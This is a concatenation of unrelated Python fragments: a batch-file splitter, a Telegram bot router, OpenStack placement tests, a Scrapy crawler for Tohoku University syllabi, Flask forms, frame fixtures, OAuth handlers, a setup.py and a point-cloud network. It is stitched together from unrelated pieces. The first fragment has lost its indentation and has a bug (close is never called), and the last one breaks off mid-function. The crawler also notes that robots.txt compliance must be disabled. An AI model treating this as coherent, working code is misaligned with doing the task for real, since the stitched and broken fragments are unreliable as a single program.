parser.add_argument("--output_dir", required=True, type=str, help="output directory")
args = parser.parse_args()
sample_sheet = args.sample_sheet
cells_per_job = args.cells_per_job
output_dir = args.output_dir
output_dir = os.path.abspath(output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
batch_files = list()
batch_num = 0
sample_counter = 0
ofh = None
with open(sample_sheet, 'rt') as fh:
for line in fh:
line = line.rstrip()
if sample_counter % cells_per_job == 0: # should always trigger on first entry
if ofh:
ofh.close
batch_num += 1
batch_file = os.path.join(output_dir, "batch.{}.sample_sheet".format(batch_num))
ofh = open(batch_file, 'wt')
batch_files.append(batch_file)
print(line, file=ofh)
sample_counter += 1
ofh.close
# write sample sheet listing.
batches_list_file = output_dir + ".batches.list"
with open(batches_list_file, 'wt') as ofh:
ofh.write("\n".join(batch_files) + "\n")
sys.exit(0)
if __name__=='__main__':
main()
|
import re
from typing import List
import telegram as tg
import telegram.ext as tg_ext
from ..models import DocumentLink, User
from ..state_managing.statemanager import StateManager
from ..state_managing.exceptions.stateerror import StateError
from ..role_managing.roleauth import RoleAuth
from ..role_managing.exceptions.roleerror import RoleError
from .routes import CommandRoute, DocumentRoute, ImageRoute, MessageRoute
class Router:
    """
    Dispatches incoming Telegram updates to registered callbacks.

    Four route kinds are supported: commands (messages starting with '/'),
    documents, images (photos) and plain text messages.  A route is served
    only when the sending user's state and roles satisfy
    ``route.is_accessible_with(state, roles)``.

    Attributes
    ----------
    command_routes: List[CommandRoute], private
        registered command routes
    document_routes: List[DocumentRoute], private
        registered document routes
    image_routes: List[ImageRoute], private
        registered image (photo) routes
    message_routes: List[MessageRoute], private
        registered text message routes
    tg: telegram.ext.Dispatcher, private
        `python-telegram-bot` dispatcher all handlers are attached to
    state_manager: StateManager, private
        class managing user states
    role_auth: RoleAuth, private
        class managing user roles
    """

    def __init__(self,
                 tg_dispatcher: tg_ext.Dispatcher,
                 state_manager: StateManager,
                 role_auth: RoleAuth) -> None:
        """
        Arguments
        ---------
        tg_dispatcher: telegram.ext.Dispatcher, required
            `python-telegram-bot` class, dispatching all kinds of updates
        state_manager: StateManager, required
            state system
        role_auth: RoleAuth, required
            role/authorization system
        """
        self.__message_routes: List[MessageRoute] = []
        self.__command_routes: List[CommandRoute] = []
        # NOTE(review): this attribute's name previously contained a
        # Cyrillic 'с' (U+0441); it is plain ASCII now, consistently at
        # every use site inside this class.
        self.__document_routes: List[DocumentRoute] = []
        self.__image_routes: List[ImageRoute] = []
        self.__tg = tg_dispatcher
        self.__state_manager = state_manager
        self.__role_auth = role_auth

    def __resolve_user(self, message: tg.Message) -> User:
        """
        Build a ``User`` for the message sender, loading state and roles.
        Falls back to state 'free' / roles ['user'] when the user is not in
        the database yet (first interaction).  Extracted from the four serve
        handlers, which previously duplicated this logic verbatim.
        """
        user = User(message.chat)
        try:  # try-except for user start initialization when he is not in db
            user.state = self.__state_manager.get_state(user.id)
            user.roles = self.__role_auth.get_user_roles(user.id)
        except (StateError, RoleError):
            user.state = 'free'
            user.roles = ['user']
        return user

    def __find_command_routes(self,
                              command: str,
                              state: str,
                              roles: List[str]) -> List[CommandRoute]:
        """
        Finds all command routes that are accessible with user state and
        roles and triggered with *command*.
        """
        return [route for route in self.__command_routes
                if command == route.command
                and route.is_accessible_with(state, roles)]

    def __find_document_routes(self,
                               file_name: str,
                               mime_type: str,
                               state: str,
                               roles: List[str]) -> List[DocumentRoute]:
        """
        Finds all document routes accessible with user state and roles whose
        (optional) file-name and MIME-type filters match the received
        document.  An empty filter on a route accepts anything.
        """
        found_routes = []
        for route in self.__document_routes:
            if route.file_names and file_name not in route.file_names:
                continue
            if route.mime_types and mime_type not in route.mime_types:
                continue
            if not route.is_accessible_with(state, roles):
                continue
            found_routes.append(route)
        return found_routes

    def __find_image_routes(self,
                            state: str,
                            roles: List[str]) -> List[ImageRoute]:
        """Finds all image routes accessible with user state and roles."""
        return [route for route in self.__image_routes
                if route.is_accessible_with(state, roles)]

    def __find_message_routes(self,
                              message: str,
                              state: str,
                              roles: List[str]) -> List[MessageRoute]:
        """
        Finds all message routes whose regex fully matches *message* and
        which are accessible with user state and roles.
        """
        return [route for route in self.__message_routes
                if re.fullmatch(route.message, message)
                and route.is_accessible_with(state, roles)]

    def __serve_command_route(self, update: tg.Update, context: tg_ext.CallbackContext) -> None:
        """
        Handler for all registered commands.  The command is the first word
        of the message with its leading '/' stripped.  Each matching route's
        callback is invoked with keyword arguments:
            user: User — sender; message: str — full message text.
        """
        message = update.message
        text = message.text
        command = text.split()[0].strip('/')
        user = self.__resolve_user(message)
        for route in self.__find_command_routes(command, user.state, user.roles):
            route.callback(user=user,
                           message=text)

    def __serve_document_route(self, update: tg.Update, context: tg_ext.CallbackContext) -> None:
        """
        Handler for all registered documents.  Each matching route's callback
        is invoked with keyword arguments:
            user: User; message: str; document: DocumentLink.
        """
        message: tg.Message = update.message
        text = message.text
        user = self.__resolve_user(message)
        document_link = DocumentLink(tg_document=message.document,
                                     media_group_id=message.media_group_id)
        found_routes = self.__find_document_routes(document_link.name,
                                                   document_link.mime_type,
                                                   user.state, user.roles)
        for route in found_routes:
            route.callback(user=user,
                           message=text,
                           document=document_link)

    def __serve_image_route(self, update: tg.Update, context: tg_ext.CallbackContext) -> None:
        """
        Handler for all registered images.  Each matching route's callback
        is invoked with keyword arguments:
            user: User; message: str; images: List[DocumentLink].
        """
        message: tg.Message = update.message
        text = message.text
        user = self.__resolve_user(message)
        # NOTE(review): message.photo lists Telegram's size variants of the
        # received photo; one DocumentLink is forwarded per entry, matching
        # the original behavior — confirm this is the intent.
        images = [DocumentLink(image_id.get_file(), message.media_group_id)
                  for image_id in message.photo]
        for route in self.__find_image_routes(user.state, user.roles):
            route.callback(user=user,
                           message=text,
                           images=images)

    def __serve_message_route(self, update: tg.Update, context: tg_ext.CallbackContext) -> None:
        """
        Handler for all registered text messages.  Each matching route's
        callback is invoked with keyword arguments:
            user: User; message: str.
        """
        message = update.message
        text = message.text
        user = self.__resolve_user(message)
        for route in self.__find_message_routes(text, user.state, user.roles):
            route.callback(user=user,
                           message=text)

    def register_command_route(self, route: CommandRoute) -> None:
        """
        Registers given command handler.

        Arguments
        ---------
        route: CommandRoute, required
            route to register
        """
        self.__command_routes.append(route)
        self.__tg.add_handler(tg_ext.CommandHandler(command=route.command,
                                                    callback=self.__serve_command_route))

    def register_document_route(self, route: DocumentRoute) -> None:
        """
        Registers given document handler.

        Arguments
        ---------
        route: DocumentRoute, required
            route to register
        """
        self.__document_routes.append(route)
        self.__tg.add_handler(tg_ext.MessageHandler(filters=tg_ext.Filters.document,
                                                    callback=self.__serve_document_route))

    def register_image_route(self, route: ImageRoute) -> None:
        """
        Registers given image handler.

        Arguments
        ---------
        route: ImageRoute, required
            route to register
        """
        self.__image_routes.append(route)
        self.__tg.add_handler(tg_ext.MessageHandler(filters=tg_ext.Filters.photo,
                                                    callback=self.__serve_image_route))

    def register_message_route(self, route: MessageRoute) -> None:
        """
        Registers given text message handler.

        Arguments
        ---------
        route: MessageRoute, required
            route to register
        """
        self.__message_routes.append(route)
        self.__tg.add_handler(tg_ext.MessageHandler(filters=tg_ext.Filters.regex(route.message),
                                                    callback=self.__serve_message_route))
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import operator
import uuid
import six
from osc_placement.tests.functional import base
class TestUsage(base.BaseTestCase):
    """Functional tests for resource-provider usage reporting."""

    def test_usage_show(self):
        # Fresh inventory must report zero usage for every resource class...
        consumer_uuid = str(uuid.uuid4())
        rp = self.resource_provider_create()
        self.resource_inventory_set(
            rp['uuid'],
            'VCPU=4',
            'VCPU:max_unit=4',
            'MEMORY_MB=1024',
            'MEMORY_MB:max_unit=1024')
        self.assertEqual([{'resource_class': 'MEMORY_MB', 'usage': 0},
                          {'resource_class': 'VCPU', 'usage': 0}],
                         sorted(self.resource_provider_show_usage(rp['uuid']),
                                key=operator.itemgetter('resource_class')))
        # ...and reflect the amounts once a consumer claims allocations.
        self.resource_allocation_set(
            consumer_uuid,
            ['rp={},VCPU=2'.format(rp['uuid']),
             'rp={},MEMORY_MB=512'.format(rp['uuid'])]
        )
        self.assertEqual([{'resource_class': 'MEMORY_MB', 'usage': 512},
                          {'resource_class': 'VCPU', 'usage': 2}],
                         sorted(self.resource_provider_show_usage(rp['uuid']),
                                key=operator.itemgetter('resource_class')))

    def test_usage_not_found(self):
        # Usage for a non-existent provider fails with a descriptive error.
        rp_uuid = str(uuid.uuid4())
        exc = self.assertRaises(base.CommandException,
                                self.resource_provider_show_usage,
                                rp_uuid)
        self.assertIn(
            'No resource provider with uuid {} found'.format(rp_uuid),
            six.text_type(exc)
        )

    def test_usage_empty(self):
        # A provider with no inventory reports an empty usage list.
        rp = self.resource_provider_create()
        self.assertEqual([], self.resource_provider_show_usage(rp['uuid']))
class TestResourceUsage(base.BaseTestCase):
    """Functional tests for usage filtered by project/user (needs microversion 1.9)."""

    # Placement API microversion that introduced usages by project/user.
    VERSION = '1.9'

    def test_usage_by_project_id_user_id(self):
        # Three consumers spread across two projects and two users.
        c1 = str(uuid.uuid4())
        c2 = str(uuid.uuid4())
        c3 = str(uuid.uuid4())
        p1 = str(uuid.uuid4())
        p2 = str(uuid.uuid4())
        u1 = str(uuid.uuid4())
        u2 = str(uuid.uuid4())
        rp = self.resource_provider_create()
        self.resource_inventory_set(rp['uuid'], 'VCPU=16')
        # p1/u1 -> 2 VCPU, p2/u1 -> 4 VCPU, p1/u2 -> 6 VCPU.
        self.resource_allocation_set(
            c1, ['rp={},VCPU=2'.format(rp['uuid'])], project_id=p1, user_id=u1)
        self.resource_allocation_set(
            c2, ['rp={},VCPU=4'.format(rp['uuid'])], project_id=p2, user_id=u1)
        self.resource_allocation_set(
            c3, ['rp={},VCPU=6'.format(rp['uuid'])], project_id=p1, user_id=u2)
        # Show usage on the resource provider for all consumers.
        self.assertEqual(
            12, self.resource_provider_show_usage(uuid=rp['uuid'])[0]['usage'])
        # Show usage for project p1.
        self.assertEqual(
            8, self.resource_show_usage(project_id=p1)[0]['usage'])
        # Show usage for project p1 and user u1.
        self.assertEqual(
            2, self.resource_show_usage(
                project_id=p1, user_id=u1)[0]['usage'])
        # Show usage for project p2.
        self.assertEqual(
            4, self.resource_show_usage(project_id=p2)[0]['usage'])
|
from abc import ABC
from pathlib import Path
import scrapy
from settings import YEAR, CRAWLING_OUTPUT_FOLDER
import json
import logging
log = logging.getLogger()
# Root of the Tohoku University syllabus site; all crawls start here.
BASE_URL = 'https://qsl.cds.tohoku.ac.jp/qsl/'
# Cycle code letter -> (Japanese cycle label, crawler cycle name).
CYCLE_MAP = { 'b': ('学士', 'bac'), 'm': ('修士', 'master'), 'd': ('博士', 'doctor') }
# Note: need to change the parameter ROBOTS_OBEY in the crawler settings.py to make the crawler work
class TohokuUnivProgramSpider(scrapy.Spider, ABC):
    """
    Programs crawler for Tohoku University.

    Crawls one program per faculty from the syllabus search portal,
    paginates through its course search results, then emits one item per
    study cycle (bachelor/master/doctor) containing the course ids.
    """
    name = "tohoku-programs"
    custom_settings = {
        'FEED_URI': Path(__file__).parent.absolute().joinpath(
            f'../../../../{CRAWLING_OUTPUT_FOLDER}tohoku_programs_{YEAR}.json').as_uri()
    }

    def start_requests(self):
        # Single entry point: the syllabus portal landing page.
        yield scrapy.Request(BASE_URL, self.parse_main)

    def parse_main(self, response):
        """Collect a program id per faculty and schedule paginated course searches."""
        faculties = response.xpath("//h4/text()").getall()
        log.info(faculties)
        # Accumulates course ids per program across paginated responses.
        self.courses_ids = {}
        for faculty in faculties:
            # Keep only the first part of composite faculty names (split on '・').
            faculty_name = faculty.split('・')[0] if '・' in faculty else faculty
            program_link = response.xpath(
                f"//h4[text()='{faculty}']/following::div[1]//a/@href").get()
            program_id = program_link.split("type=")[1]
            self.courses_ids[program_id] = []
            search_url = f"/qsl/syllabus/search_more?skip=0&type={program_id}&query_string="
            yield response.follow(
                search_url, callback=self.parse_program,
                cb_kwargs={"faculty_name": faculty_name, "program_id": program_id})

    def parse_program(self, response, faculty_name, program_id):
        """
        Accumulate course ids from one JSON search page.  When an empty page
        is returned (pagination exhausted), emit one item per study cycle;
        otherwise request the next page.
        """
        data = json.loads(response.body)
        syllabus_data = data["syllabus_data"]
        courses_ids = [s["_source"]["page"] for s in syllabus_data]
        self.courses_ids[program_id] += courses_ids
        if len(syllabus_data) == 0:
            # Pagination done: deduplicate and group accumulated courses by cycle.
            courses_ids = list(set(self.courses_ids[program_id]))
            for cycle in list(CYCLE_MAP.keys()):
                # Second character of a course id appears to encode the cycle
                # letter ('b'/'m'/'d') — NOTE(review): inferred from c[1]; confirm.
                cycle_courses_ids = [c for c in courses_ids if c[1] == cycle]
                if len(cycle_courses_ids) == 0:
                    continue
                yield {
                    "id": '_'.join([cycle, program_id]),
                    "name": f"{faculty_name}({CYCLE_MAP[cycle][0]})",
                    "cycle": CYCLE_MAP[cycle][1],
                    "faculties": [faculty_name],
                    "campuses": [],  # didn't find information on campuses
                    "url": f"{BASE_URL}syllabus/find?type={program_id}",
                    "courses": cycle_courses_ids,
                    "ects": []  # ECTS not applicable in Japan
                }
            return
        # More results may follow: bump the 'skip' offset and fetch the next page.
        n_limit = data["n_limit"]
        skip = data["skip"]
        search_url = response.url.replace(f"skip={skip}", f"skip={skip + n_limit}")
        yield response.follow(
            search_url, callback=self.parse_program,
            cb_kwargs={"faculty_name": faculty_name, "program_id": program_id})
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, TextAreaField
# from wtforms.validators import Required, Email, EqualTo
from ..models import User
from wtforms import ValidationError
from wtforms import StringField, PasswordField, BooleanField, SubmitField
class UpdateProfile(FlaskForm):
    """Form for editing a user's profile username."""
    username = TextAreaField('enter username')
    submit = SubmitField('Submit')
class BlogForm(FlaskForm):
    """Form for creating a blog post (title + content)."""
    title = TextAreaField('enter title')
    content = TextAreaField('type your blog')
    submit = SubmitField('Submit')
class CommentForm(FlaskForm):
    """Form for commenting on a blog post."""
    content = TextAreaField('comment')
    submit = SubmitField('Submit')
|
# Indices into the (data, frame_len, frame_crc) tuples returned by the
# getDataFrame* fixture helpers below.
COL_DATA_FRAME = 0
COL_DATA_FRAME_LEN = 1
COL_DATA_FRAME_CRC = 2
def getDataFrame1():
    """Return a well-formed test frame as (raw bytes, payload length, CRC)."""
    fLen = 0x05
    dCRC = 0xAB
    # STX, header, length, payload (0x10 0x10 0x03 0x01), CRC
    frame = bytearray((0x02, 0x3C, fLen, 0x10, 0x10, 0x03, 0x01, dCRC))
    return (frame, fLen, dCRC)
def getDataFrame_ERR_Header():
    """Return a test frame with a corrupted header byte (0x32 instead of 0x3C)."""
    fLen = 0x05
    dCRC = 0xAB
    frame = bytearray((0x02, 0x32, fLen, 0x10, 0x10, 0x03, 0x01, dCRC))
    return (frame, fLen, dCRC)
def getDataFrame_ERR_CRC():
    """Return a test frame carrying a wrong CRC value (0x03)."""
    fLen = 0x05
    dCRC = 0x03
    frame = bytearray((0x02, 0x3C, fLen, 0x10, 0x10, 0x03, 0x01, dCRC))
    return (frame, fLen, dCRC)
def getDataFrame_ERR_LEN():
    """Return a test frame whose declared length (0x09) exceeds the payload."""
    fLen = 0x09
    dCRC = 0xAB
    frame = bytearray((0x02, 0x3C, fLen, 0x10, 0x10, 0x03, 0x01, dCRC))
    return (frame, fLen, dCRC)
def getDataFrame_ERR_LEN_Diff():
    """Return a test frame whose actual payload is longer than the declared length."""
    fLen = 0x05
    dCRC = 0xAB
    # Three extra bytes (0x20 0x55 0x9C) are inserted before the CRC.
    frame = bytearray((0x02, 0x3C, fLen, 0x10, 0x10, 0x03, 0x01,
                       0x20, 0x55, 0x9C, dCRC))
    return (frame, fLen, dCRC)
# Copyright 2019 Autodesk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO: figure out what's missing from the build. CMake based builds work
# without this.
# We are forcing the creation of wrappers.
from pxr import Usd, UsdGeom, UsdShade, UsdLux
import _usdArnold
del Usd, UsdGeom, UsdShade, UsdLux

# Lift the wrapped C++ symbols from _usdArnold into this module's namespace.
from pxr import Tf
Tf.PrepareModule(_usdArnold, locals())
del Tf

# Best-effort attachment of generated docstrings; fall back to the temporary
# doc module, and proceed silently when neither exists.
try:
    import __DOC
    __DOC.Execute(locals())
    del __DOC
except Exception:
    try:
        import __tmpDoc
        __tmpDoc.Execute(locals())
        del __tmpDoc
    except Exception:
        # Bugfix: this was a bare 'except:', which also swallowed
        # SystemExit/KeyboardInterrupt; Exception keeps the intended
        # best-effort behavior without masking interpreter exits.
        pass
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2019 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Handlers for customizing oauthclient endpoints."""
from __future__ import absolute_import, print_function
from functools import partial, wraps
import six
from flask import current_app, flash, redirect, render_template, request, \
session, url_for
from flask_babelex import gettext as _
from flask_login import current_user
from invenio_db import db
from werkzeug.utils import import_string
from ..errors import AlreadyLinkedError, OAuthClientError, OAuthError, \
OAuthRejectedRequestError, OAuthResponseError, \
OAuthClientAlreadyAuthorized, OAuthClientUnAuthorized, \
OAuthClientTokenNotSet, OAuthClientUserNotRegistered, \
OAuthClientTokenNotFound, OAuthClientMustRedirectLogin, \
OAuthClientMustRedirectSignup
from ..models import RemoteAccount, RemoteToken
from ..proxies import current_oauthclient
from ..signals import account_info_received, account_setup_committed, \
account_setup_received
from ..utils import create_csrf_disabled_registrationform, \
create_registrationform, fill_form, oauth_authenticate, oauth_get_user, \
oauth_register
from .utils import get_session_next_url, response_token_setter, token_getter, \
token_session_key, token_setter
from .base import (
base_authorized_signup_handler,
base_disconnect_handler,
base_signup_handler
)
def _oauth_error_handler(remote, f, *args, **kwargs):
    """Run ``f(remote, *args, **kwargs)``, translating known OAuth errors.

    Each recognized exception type is converted into a user-facing
    redirect/flash message; genuinely unexpected failures are re-raised
    as :class:`OAuthError` so they surface as server errors.

    :param remote: The remote application.
    :param f: The handler to invoke.
    :returns: The handler's response, or an error redirect.
    """
    try:
        return f(remote, *args, **kwargs)
    except OAuthClientError as e:
        # Log the low-level client error, then show a generic failure page.
        current_app.logger.warning(e.message, exc_info=True)
        return oauth2_handle_error(
            e.remote, e.response, e.code, e.uri, e.description
        )
    except OAuthClientUnAuthorized:
        return current_app.login_manager.unauthorized()
    except AlreadyLinkedError:
        flash(
            _('External service is already linked to another account.'),
            category='danger')
        return redirect(url_for('invenio_oauthclient_settings.index'))
    except OAuthRejectedRequestError:
        flash(
            _('You rejected the authentication request.'),
            category='info')
        return redirect('/')
    except OAuthClientAlreadyAuthorized:
        return redirect('/')
    except OAuthClientTokenNotFound:
        return redirect('/')
    except OAuthClientUserNotRegistered:
        raise OAuthError('Could not create user.', remote)
    except OAuthClientTokenNotSet:
        raise OAuthError('Could not create token for user.', remote)
    # The bound exception variables were unused; drop the `as e` bindings.
    except OAuthClientMustRedirectSignup:
        return redirect(url_for('.signup', remote_app=remote.name,))
    except OAuthClientMustRedirectLogin:
        return redirect(url_for('.login', remote_app=remote.name,))
#
# Error handling decorators
#
def oauth_resp_remote_error_handler(f):
    """Decorator to handle exceptions."""
    @wraps(f)
    def inner(resp, remote, *args, **kwargs):
        # Genuine OAuthErrors are deliberately not caught here: they must
        # bubble up and produce a 500 Internal Server Error.
        def call_with_resp(remote_app, *a, **kw):
            return f(resp, remote_app, *a, **kw)
        return _oauth_error_handler(remote, call_with_resp, *args, **kwargs)
    return inner
def oauth_remote_error_handler(f):
    """Decorator to handle exceptions."""
    def inner(remote, *args, **kwargs):
        # Genuine OAuthErrors propagate on purpose so that they surface
        # as 500 Internal Server Errors.
        return _oauth_error_handler(remote, f, *args, **kwargs)
    return wraps(f)(inner)
#
# Handlers
#
@oauth_resp_remote_error_handler
def authorized_default_handler(resp, remote, *args, **kwargs):
    """Store access token in session.
    Default authorized handler.
    :param remote: The remote application.
    :param resp: The response.
    :returns: Redirect response.
    """
    # Persist the token from the OAuth response, committing before the
    # redirect so the token survives this request.
    response_token_setter(remote, resp)
    db.session.commit()
    return redirect(url_for('invenio_oauthclient_settings.index'))
@oauth_resp_remote_error_handler
def authorized_signup_handler(resp, remote, *args, **kwargs):
    """Handle sign-in/up functionality.
    :param remote: The remote application.
    :param resp: The response.
    :returns: Redirect response.
    """
    next_url = base_authorized_signup_handler(resp, remote, *args, **kwargs)
    # Prefer the post-login target captured during the flow; otherwise land
    # on the linked-accounts settings page.
    settings_url = url_for('invenio_oauthclient_settings.index')
    return redirect(next_url if next_url else settings_url)
@oauth_remote_error_handler
def disconnect_handler(remote, *args, **kwargs):
    """Handle unlinking of remote account.
    This default handler will just delete the remote account link. You may
    wish to extend this module to perform clean-up in the remote service
    before removing the link (e.g. removing install webhooks).
    :param remote: The remote application.
    :returns: Redirect response.
    """
    # Delegate the actual unlink to the shared base implementation.
    base_disconnect_handler(remote, *args, **kwargs)
    return redirect(url_for('invenio_oauthclient_settings.index'))
@oauth_remote_error_handler
def signup_handler(remote, *args, **kwargs):
    """Handle extra signup information.
    :param remote: The remote application.
    :returns: Redirect response or the template rendered.
    """
    try:
        form = create_registrationform(request.form)
        next_url = base_signup_handler(remote, form, *args, **kwargs)
        if form.is_submitted():
            # Form was posted: registration completed in the base handler;
            # send the user on to the captured next URL, or home.
            if next_url:
                return redirect(next_url)
            else:
                return redirect('/')
        # Initial GET: render the signup form together with the remote
        # app's display metadata from configuration.
        return render_template(
            current_app.config['OAUTHCLIENT_SIGNUP_TEMPLATE'],
            form=form,
            remote=remote,
            app_title=current_app.config['OAUTHCLIENT_REMOTE_APPS'][
                remote.name].get('title', ''),
            app_description=current_app.config['OAUTHCLIENT_REMOTE_APPS'][
                remote.name].get('description', ''),
            app_icon=current_app.config['OAUTHCLIENT_REMOTE_APPS'][
                remote.name].get('icon', None),
        )
    except OAuthClientUnAuthorized:
        # Redirect the user after registration (which doesn't include the
        # activation), waiting for user to confirm his email.
        return redirect(url_for('security.login'))
def oauth2_handle_error(remote, resp, error_code, error_uri,
                        error_description):
    """Handle errors during exchange of one-time code for an access tokens."""
    # Error details are intentionally not shown to the end user; flash a
    # generic failure message and send them back to the front page.
    flash(_('Authorization with remote service failed.'))
    return redirect('/')
|
import os
import distutils.core
# Extra compiler flags; only populated when DEBUG is set in the environment.
DEBUG_COMPILE_ARGS = None
VERSION = "0.0.1"
NAME = "bst"
DESCRIPTION = "Python binary search tree package written in C."
KEYWORDS = ["binary", "search", "tree", "C"]
if "DEBUG" in os.environ:
    # Debug builds: disable optimization, keep symbols, and enable strict
    # C warnings so extension bugs surface early.
    DEBUG_COMPILE_ARGS = ['-O0', '-g', '-pedantic-errors', '-Wall', '-Wextra', '-Wmissing-prototypes',
                          '-Wstrict-prototypes', '-Wold-style-definition']
distutils.core.setup(
    name=NAME,
    version=VERSION,
    description=DESCRIPTION,
    author="Warren Spencer",
    author_email="warrenspencer27@gmail.com",
    url="https://github.com/warrenspe/%s" % NAME,
    download_url="https://github.com/warrenspe/%s/tarball/%s" % (NAME, VERSION),
    keywords=KEYWORDS,
    classifiers=[],
    license="https://opensource.org/licenses/MIT",
    platforms=["Linux", "Windows"],
    ext_modules=[
        # The C extension source lives at bst/bst.c with headers in bst/.
        distutils.core.Extension(
            NAME,
            sources = ['{0}/{0}.c'.format(NAME)],
            include_dirs = [NAME],
            extra_compile_args=DEBUG_COMPILE_ARGS
        )
    ]
)
|
import torch
import torch.nn as nn
from lightconvpoint.nn import Convolution_ConvPoint as Conv
from lightconvpoint.nn import max_pool, interpolate
from lightconvpoint.spatial import knn, sampling_convpoint as sampling
class ConvPointNetwork(torch.nn.Module):
    """ConvPoint point-cloud network.

    With ``segmentation=True`` this is a U-Net-style encoder/decoder with
    skip connections and a per-point 1x1 conv output head; otherwise it is
    a 5-stage encoder followed by global average pooling and a linear
    classifier head.
    """
    def __init__(self, in_channels, out_channels, segmentation=False, hidden=64):
        """Build the layer stack.

        :param in_channels: number of input feature channels per point.
        :param out_channels: number of output classes/channels.
        :param segmentation: choose the segmentation (True) or
            classification (False) architecture.
        :param hidden: base channel width; deeper stages use multiples.
        """
        super().__init__()
        self.segmentation = segmentation
        # Flag consumed by the lightconvpoint framework (see library docs).
        self.lcp_preprocess = True
        if self.segmentation:
            # Encoder: cv0 works at full resolution, cv1..cv6 at
            # progressively subsampled point sets.
            self.cv0 = Conv(in_channels, hidden, 16, bias=False,)
            self.bn0 = nn.BatchNorm1d(hidden)
            self.cv1 = Conv(hidden, hidden, 16, bias=False)
            self.bn1 = nn.BatchNorm1d(hidden)
            self.cv2 = Conv(hidden, hidden, 16, bias=False)
            self.bn2 = nn.BatchNorm1d(hidden)
            self.cv3 = Conv(hidden, hidden, 16, bias=False)
            self.bn3 = nn.BatchNorm1d(hidden)
            self.cv4 = Conv(hidden, 2*hidden, 16, bias=False)
            self.bn4 = nn.BatchNorm1d(2*hidden)
            self.cv5 = Conv(2*hidden, 2*hidden, 16, bias=False)
            self.bn5 = nn.BatchNorm1d(2*hidden)
            self.cv6 = Conv(2*hidden, 2*hidden, 16, bias=False)
            self.bn6 = nn.BatchNorm1d(2*hidden)
            # Decoder: the 4*hidden / 2*hidden input widths account for the
            # skip-connection concatenations done in forward().
            self.cv5d = Conv(2*hidden, 2*hidden, 16, bias=False)
            self.bn5d = nn.BatchNorm1d(2*hidden)
            self.cv4d = Conv(4*hidden, 2*hidden, 16, bias=False)
            self.bn4d = nn.BatchNorm1d(2*hidden)
            self.cv3d = Conv(4*hidden, hidden, 16, bias=False)
            self.bn3d = nn.BatchNorm1d(hidden)
            self.cv2d = Conv(2*hidden, hidden, 16, bias=False)
            self.bn2d = nn.BatchNorm1d(hidden)
            self.cv1d = Conv(2*hidden, hidden, 16, bias=False)
            self.bn1d = nn.BatchNorm1d(hidden)
            self.cv0d = Conv(2*hidden, hidden, 16, bias=False)
            self.bn0d = nn.BatchNorm1d(hidden)
            self.fcout = nn.Conv1d(2*hidden, out_channels, 1)
        else:
            self.cv1 = Conv(in_channels, hidden, 16, bias=False, sampling=sampling)
            self.bn1 = nn.BatchNorm1d(hidden)
            self.cv2 = Conv(hidden, 2*hidden, 16, bias=False, sampling=sampling)
            self.bn2 = nn.BatchNorm1d(2*hidden)
            self.cv3 = Conv(2*hidden, 4*hidden, 16, bias=False, sampling=sampling)
            self.bn3 = nn.BatchNorm1d(4*hidden)
            self.cv4 = Conv(4*hidden, 4*hidden, 16, bias=False, sampling=sampling)
            self.bn4 = nn.BatchNorm1d(4*hidden)
            self.cv5 = Conv(4*hidden, 8*hidden, 16, bias=False, sampling=sampling)
            self.bn5 = nn.BatchNorm1d(8*hidden)
            self.fcout = nn.Linear(8*hidden, out_channels)
        self.activation = nn.ReLU()
        self.dropout = nn.Dropout(0.5)
    def forward(self, x, pos, support_points=None, neighbors_indices=None):
        """Run the network.

        :param x: per-point features (may be None to only precompute the
            support points and neighborhood indices).
        :param pos: input point positions.
        :param support_points: optional precomputed support point sets.
        :param neighbors_indices: optional precomputed kNN index sets.
        :returns: (output, support_points, neighbors_indices).
        """
        if self.segmentation:
            if support_points is not None:
                support1, support2, support3, support4, support5, support6 = support_points
            else:
                support1, support2, support3, support4, support5, support6 = [None for _ in range(6)]
            if neighbors_indices is not None:
                ids0, ids1, ids2, ids3, ids4, ids5, ids6, ids5d, ids4d, ids3d, ids2d, ids1d, ids0d = neighbors_indices
            else:
                ids0, ids1, ids2, ids3, ids4, ids5, ids6, ids5d, ids4d, ids3d, ids2d, ids1d, ids0d = [None for _ in range(13)]
            # Encoder spatial structure: subsample by 4x at each stage and
            # gather 16 neighbors for each support point.
            support1, _ = sampling(pos, 0.25, support1, None)
            ids1 = knn(pos, support1, 16, ids1)
            support2, _ = sampling(support1, 0.25, support2, None)
            ids2 = knn(support1, support2, 16, ids2)
            support3, _ = sampling(support2, 0.25, support3, None)
            ids3 = knn(support2, support3, 16, ids3)
            support4, _ = sampling(support3, 0.25, support4, None)
            ids4 = knn(support3, support4, 16, ids4)
            support5, _ = sampling(support4, 0.25, support5, None)
            ids5 = knn(support4, support5, 16, ids5)
            support6, _ = sampling(support5, 0.25, support6, None)
            ids6 = knn(support5, support6, 16, ids6)
            # Decoder neighborhoods (coarse -> fine), smaller k when upsampling.
            ids5d = knn(support6, support5, 4, ids5d)
            ids4d = knn(support5, support4, 4, ids4d)
            ids3d = knn(support4, support3, 4, ids3d)
            ids2d = knn(support3, support2, 8, ids2d)
            ids1d = knn(support2, support1, 8, ids1d)
            ids0d = knn(support1, pos, 8, ids0d)
            ids0 = knn(pos, pos, 16, ids0)
            if x is not None:
                # Encoder pass, keeping each stage's output for skips.
                x0 = self.activation(self.bn0(self.cv0(x, pos, pos, ids0)))
                x1 = self.activation(self.bn1(self.cv1(x0, pos, support1, ids1)))
                x2 = self.activation(self.bn2(self.cv2(x1, support1, support2, ids2)))
                x3 = self.activation(self.bn3(self.cv3(x2, support2, support3, ids3)))
